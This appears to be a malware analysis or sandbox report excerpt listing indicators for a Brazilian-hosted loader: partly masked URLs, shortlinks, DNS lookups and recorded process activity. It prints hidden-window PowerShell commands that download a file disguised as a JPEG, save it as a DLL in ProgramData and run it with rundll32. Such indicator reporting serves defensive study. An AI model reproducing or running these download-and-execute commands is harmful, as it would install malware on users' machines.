Technical Information
- http://www.ze######ao2016.xpg.com.br/site/img001.jpg as %programdata%\eropsbaxlbek_user\eropsbaxlbek_user_hgwfk.dll
- http://bi#.ly/1hu0faz
- http://bi#.ly/1HU0fAz
- http://www.go###e.com.br/zegoiano2016.xpg
- DNS ASK ze######ao2016.xpg.com.br
- DNS ASK bi#.ly
- DNS ASK go###e.com.br
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' (new-objeCt system.net.webClient).downloadFile('""http://www.ze######ao2016.xpg.com.br/site/img001.jpg','%PROGRAMDATA%\eropsbaxlbek_user\eropsbaxlbek_user_hgwfk.dll');start-proCess rundll32.exe...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' (new-objeCt net.webClient).downloadstring('http://bi#.ly/1HU0fAz')"' (with hidden window)
- '<SYSTEM32>\rundll32.exe' %PROGRAMDATA%\eropsbaxlbek_user\eropsbaxlbek_user_hgwfk.dll dlgProc